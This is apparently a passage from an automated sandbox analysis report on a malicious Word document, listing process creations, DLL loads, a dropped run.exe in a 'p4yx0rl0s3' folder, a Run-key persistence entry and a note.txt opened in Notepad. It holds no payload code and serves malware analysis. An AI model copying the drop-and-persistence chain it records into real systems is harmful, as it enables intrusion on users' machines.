      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: apphelp.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: secur32.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: userenv.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: sspicli.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: secur32.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: userenv.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: secur32.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: userenv.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\p4yx0rl0s3\run.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
      Source: em_webdev_assignment_dec2024.LNK.0.drLNK file: ..\..\..\..\..\Desktop\em_webdev_assignment_dec2024.doc
      Source: Templates.LNK.0.drLNK file: ..\..\Templates
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
      Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
      Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
      Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
      Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
      Source: ~WRD0002.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
      Source: Insight design set.dotx.0.drInitial sample: OLE indicators vbamacros = False
      Source: run.exe.4.drStatic PE information: section name: .xdata
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D21DDF pushad ; retf 005Eh4_2_04D21DFA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D21D4F pushad ; retf 005Eh4_2_04D21DCA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\p4yx0rl0s3\run.exeJump to dropped file
      Source: C:\Users\user\p4yx0rl0s3\run.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run p4yx0rl0s3
      Source: C:\Users\user\p4yx0rl0s3\run.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run p4yx0rl0s3

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
